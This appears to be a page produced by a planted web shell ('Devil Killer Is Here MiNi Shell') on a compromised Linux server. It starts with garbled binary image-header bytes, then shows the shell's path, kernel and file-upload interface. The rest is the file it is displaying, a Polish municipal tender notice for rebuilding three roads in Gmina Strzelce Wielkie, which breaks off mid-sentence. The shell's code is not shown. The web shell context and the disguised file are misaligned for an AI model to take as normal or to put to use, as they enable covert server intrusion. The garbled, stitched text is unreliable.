JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220428/0013879201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa trzech dróg gminnych wraz z niezbędną infrastrukturą <br/>w miejscowościach a) Antonina; b) Dębowiec Wielki; c) Strzelce Wielkie ul. Piłsudskiego - Rządowy Fundusz Polski Ład” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA STRZELCE WIELKIE</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dział Zamówień Publicznych</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 151398646</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Częstochowska 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelce Wielkie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-337</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">343110778</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia-publiczne@strzelce-wielkie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.strzelce-wielkie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa trzech dróg gminnych wraz z niezbędną infrastrukturą <br/>w miejscowościach a) Antonina; b) Dębowiec Wielki; c) Strzelce Wielkie ul. Piłsudskiego - Rządowy Fundusz Polski Ład” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c099568b-c6ce-11ec-aa46-6a814e8de928</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00138792</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017045/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 &#34;Przebudowa trzech dróg gminnych wraz z niezbędną infrastrukturą w miejscowościach a) Antonina; b) Dębowiec Wielki; c) Strzelce Wielkie ul. Piłsudskiego - Rządowy Fundusz Polski Ład&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://wwww.platformazakupowa.pl/pn/strzelce_wielkie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://wwww.platformazakupowa.pl/pn/strzelce_wielkie</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>9.6. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej w<br/>zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Gmina Strzelce Wielkie reprezentowana przez Wójta Gminy Strzelce Wielkie<br/>Dane tele-adresowe Zamawiającego:<br/>Gmina Strzelce Wielkie<br/>98-337 Strzelce Wielkie ul. Częstochowska 14<br/>Adres e-mail: zamowienia-publiczne@strzelce-wielkie.pl<br/>Tel. (34) 311-07-78<br/>• w Gminie Strzelce Wielkie wyznaczony został Inspektor Ochrony Danych, kontakt:<br/>kontakt@odoonline.pl, telefon 791 650 517<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego prowadzonym w trybie podstawowym pn.: „Przebudowa trzech dróg gminnych wraz z niezbędną<br/>infrastrukturą<br/>w miejscowościach a) Antonina; b) Dębowiec Wielki; c) Strzelce Wielkie ul. Piłsudskiego - Rządowy Fundusz Polski Ład” Znak<br/>sprawy: ZPI.271.5.2022<br/>Pozostałe informacje dotyczące RODO zawarte są w rozdziale 19 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZPI.271.5.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1. Przedmiotem zamówienia jest zadanie polegające na wykonaniu kompletnej dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz realizacja zadania inwestycyjnego pod nazwą: „Przebudowa trzech dróg gminnych wraz z niezbędną infrastrukturą w miejscowościach a) Antonina; b) Dębowiec Wielki; c) Strzelce Wielkie <br/>ul. Piłsudskiego - Rządowy Fundusz Polski Ład” <br/>W zakresie:<br/>Zadanie nr 1 – przebudowa drogi gminnej w miejscowości Antonina o długości minimum 845 mb (działka 120 obręb Antonina, Gmina Strzelce Wielkie) w km od 0+150 km do 0+995 km wg. mapy zagospodarowania terenu w PFU<br/>Zadanie nr 2 – przebudowa drogi gminnej w miejscowości Dębowiec Wielki o długości minimum 845 mb (działka 451 obręb Dębowiec Wielki, Gmina Strzelce Wielkie) w km od 0+150 km do 0+995 km wg. mapy zagospodarowania terenu w PFU<br/>Zadanie nr 3 – budowa ulicy Piłsudskiego o długości minimum 270,19 mb (działki 64/11, 64/9, 65/14, 64/22 obręb Strzelce Wielkie, Gmina Strzelce Wielkie)<br/><br/>Wykonawca zobowiązany jest do wykonania kompletnej dokumentacji projektowej oraz wykonania na jej podstawie robót budowlanych dla wymienionych wszystkich lokalizacji zadania w oparciu o obowiązujące w tym zakresie przepisy prawa. Zamawiający wymaga aby<br/>Wykonawca w ramach przedmiotu zamówienia dokonał wszelakich: zgłoszeń, uzyskał wymagane uzgodnienia, pozwolenia, dokonał wytyczenia i ewidencje wymagane do realizacji<br/>zadania. Zamawiający wymaga aby przedmiot zamówienia wykonany był z materiałów Wykonawcy. Szczegółowo przedmiot zamówienia opisany został w załączniku do SWZ, <br/>tj.: Program Funkcjonalno-Użytkowy dla zadania stanowiący załącznik nr 8 zwanym <br/>w dalszej części PFU.<br/>4.2. Wykonawca zobowiązany będzie do zapewnienia obsługi geodezyjnej inwestycji (wytyczenie i inwentaryzacja powykonawcza).<br/>4.3. Tam, gdzie w PFU, zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 101 ust. 1–3 ustawy, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych pod warunkiem, że zagwarantują one prawidłową realizację robót oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach. Uwaga! Ciężar udowodnienia równoważności zaoferowanych materiałów spoczywa na Wykonawcy zgodnie z art. 101 ust. 5 ustawy. W związku z tym Wykonawca jest zobowiązany do udokumentowania równoważności materiałów w stosunku do materiałów przewidzianych w PFU. Kryteria równoważności zostały określone w PFU.<br/>4.4. Wykonawca winien zapoznać się ze wszystkimi zapisami SWZ. Wykonawca powinien<br/>zdobyć wszelkie informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy na realizację zamówienia. Wykonawca poniesie wszystkie koszty związane z przygotowaniem i złożeniem oferty.<br/>4.5. Oznaczenie wg Wspólnego Słownika Zamówień (CPV):<br/>45233100-0 Roboty w zakresie budowy autostrad, dróg<br/>71320000-7 Usługi inżynieryjne w zakresie projektowania<br/>45000000-7 Roboty budowlane<br/>4.6. Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie<br/>przez Wykonawców, o których mowa w art. 94 i 96 ust. 2 pkt 2 ustawy.<br/>4.7. Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy.<br/>4.8. Zamawiający nie dopuszcza składania ofert częściowych. Zamawiający nie dokonał podziału zamówienia, gdyż podział zamówienia na części spowodowałby nadmierne trudności techniczne, organizacyjne oraz finansowe a także terminową realizację wykonania zamówienia. Udzielenie jednego zamówienia jest zasadne z uwagi na jednolity charakter robót budowlanych zamówienia oraz z istotnych przyczyn technicznych. Nie dokonując podziału Zamawiający nie utrudnia konkurencji, zapewniając dostęp do zamówienia wszystkim wykonawcom dającym gwarancję należytego wykonania zamówienia. Niepodzielność podyktowana jest także względami ekonomicznymi – jeden kierownik budowy to niższe koszty uzyskania zamówienia, a jeden Inwestor Nadzoru to niższe koszty realizacji całej inwestycji. Przedmiot zamówienia stanowi jedno zamierzenie inwestycyjne zgodnie z wnioskiem o dofinansowanie. Stąd też zasadne jest aby zadanie realizowane było przez jednego Wykonawcę.<br/>4.9. Zamawiający nie dopuszcza składania ofert wariantowych.<br/>4.10. Zamawiający nie nakłada wymogu odbycia przez Wykonawcę wizji lokalnej lub sprawdzenia dokumentów niezbędnych do realizacji dostępnych na miejscu u Zamawiającego.<br/>4.11. Zamawiający dopuszcza powierzenie części zamówienia podwykonawcom. Zamawiający żąda wskazania przez Wykonawcę w ofercie części zamówienia, której wykonanie zamierza powierzyć podwykonawcom oraz nazwę podwykonawcy, o ile jest znana na tym etapie. Wskazanie niniejszego nastąpi w Formularzu Ofertowym, stanowiącym Załącznik nr 1 do SWZ. W przypadku, gdy Wykonawca powołuje się na zasadach określonych w art. 118 ustawy, na zasoby podwykonawcy, w celu wykazania spełniania warunków, o których mowa w art. 112 ustawy, Zamawiający wymaga podania w Formularzu Ofertowym, dodatkowo nazwy (firmy) tego podwykonawcy.<br/>4.12. Zamawiający określił wymagania dotyczące umowy o podwykonawstwo we wzorze umowy, stanowiącym załącznik nr 7 do SWZ,<br/>4.13. Zamawiający stosownie do art. 95 ustawy, wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy osób wykonujących prace fizyczne w zakresie realizacji przedmiotu zamówienia, gdyż wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy.<br/>4.13.1. Rodzaj czynności niezbędnych do realizacji zamówienia, których dotyczą wymagania zatrudnienia na podstawie stosunku pracy przez wykonawcę lub podwykonawcę osób wykonujących prace fizyczne w trakcie realizacji zamówienia. Wymóg ten nie dotyczy osób, o których mowa w pkt 7.1.4 lit. b SWZ.<br/>4.13.2. Sposób dokumentowania zatrudnienia osób, o których mowa w art. 95 ust. 2 ustawy <br/>w związku z art. 438 ustawy. Zamawiający wymaga w związku z koniecznością realizacji zamówienia przez osoby zatrudnione na podstawie umowy o pracę:<br/>a) dla udokumentowania zatrudnienia osób, o których mowa powyżej, Wykonawca zobowiązany będzie złożyć, w terminie określonym we wzorze umowy – załącznik nr 7 do SWZ, oświadczenie o spełnieniu wymogu dotyczącego zatrudnienia na podstawie umowy pracę, zawierające imienne wskazanie osób zatrudnionych na podstawie umowy o pracę, wraz z wykazem osób wyznaczonych do faktycznego realizowania przedmiotu zamówienia. Powyższy obowiązek Wykonawcy dokumentowania zatrudnienia osób obejmuje także pracowników podwykonawców.<br/>b) w trakcie realizacji zamówienia, Zamawiający będzie uprawniony do wykonywania czynności kontrolnych wobec Wykonawcy odnośnie spełnienia przez Wykonawcę lub podwykonawcę/dalszego podwykonawcę wymogu zatrudnienia na podstawie umowy o pracę w/w osób. Wykonawca na każde wezwanie Zamawiającego, w wyznaczonym w tym wezwaniu terminie, przedłoży Zamawiającemu wskazane (według wyboru Zamawiającego) poniżej dowody w celu potwierdzenia spełnienia wymogu zatrudnienia na podstawie umowy o pracę<br/>przez Wykonawcę lub podwykonawcę osób wykonujących wskazane w pkt 4.13.1 czynności<br/>w trakcie realizacji zamówienia;<br/>c) oświadczenie Wykonawcy lub podwykonawcy o zatrudnieniu na podstawie umowy o pracę osób wykonujących czynności, których dotyczy wezwanie Zamawiającego. Oświadczenie to powinno zawierać w szczególności: dokładne określenie podmiotu składającego oświadczenie, datę złożenia oświadczenia, wskazanie, że objęte wezwaniem czynności wykonują osoby zatrudnione na podstawie umowy o pracę wraz ze wskazaniem liczby tych osób, imion <br/>i nazwisk tych osób, rodzaju umowy o pracę i wymiaru etatu oraz podpis osoby uprawnionej do złożenia oświadczenia w imieniu Wykonawcy lub podwykonawcy;<br/>d) poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lub podwykonawcę kopię umowy/umów o pracę osób wykonujących w trakcie realizacji zamówienia czynności, których dotyczy ww. oświadczenie Wykonawcy lub podwykonawcy (wraz z dokumentem regulującym zakres obowiązków, jeżeli został sporządzony). Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych (tj. w szczególności bez podawania adresów, nr PESEL pracowników). Imię i nazwisko pracownika nie podlegają anonimizacji. Informacje takie jak: data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być możliwe do zidentyfikowania;<br/>e) zaświadczenie właściwego oddziału ZUS, potwierdzające opłacanie przez Wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;<br/>f) poświadczoną za zgodność z oryginałem odpowiednio przez Wykonawcę lub podwykonawcę kopię dowodu potwierdzającego zgłoszenie pracownika przez pracodawcę do ubezpieczeń, zanonimizowaną w sposób zapewniający ochronę danych osobowych pracowników, zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych. Imię i nazwisko pracownika nie podlegają anonimizacji.<br/>4.13.3. Wymóg zatrudnienia na podstawie umowy o pracę, o którym mowa powyżej musi być spełniony przez Wykonawcę przez cały okres realizacji umowy. W przypadku zmiany osób <br/>w trakcie obowiązywania umowy, Wykonawca zobowiązany jest zaktualizować wykaz <br/>i oświadczenie, o którym mowa w pkt 4.13.2 lit. a<br/>4.13.4. Niespełnienie przedmiotowych wymagań skutkować będzie naliczeniem kar umownych w wysokości określonej we wzorze umowy – załącznik nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie<br/>następujących kryteriów oceny ofert:<br/>Nazwa kryterium i znaczenie kryterium (w %)<br/>K1. Cena 60 %<br/>K2. Gwarancja 40%<br/>14.4. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów<br/>oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>14.5. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/>Cena oferty najtańszej<br/>------------------------x 60 = liczba punktów<br/>Cena oferty badanej<br/>Końcowy wynik powyższego działania zostanie podany z dokładnością do dwóch miejsc po<br/>przecinku.<br/>14.6. Punkty za kryterium „Gwarancja” przyznane za okres udzielonej gwarancji na wykonane roboty budowlane zostaną obliczone<br/>według wzoru:<br/>G B<br/>------- x 40 = liczba punktów<br/>G max<br/>GB – okres gwarancji w miesiącach zadeklarowany przez Wykonawcę w ofercie badanej (zadeklarowany okres gwarancji nie może<br/>być krótszy niż 36 miesięcy i dłuższy niż 60 miesięcy. W przypadku zadeklarowania dłuższego okresu gwarancji przy obliczaniu<br/>punktacji zostanie on potraktowany jako okres 60 miesięcy).<br/>G max – najdłuższy okres gwarancji w miesiącach oferowany przez Wykonawców.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu dotyczące:<br/>7.1.1. Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać.<br/>7.1.2 Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać.<br/>7.1.3 Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>a) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 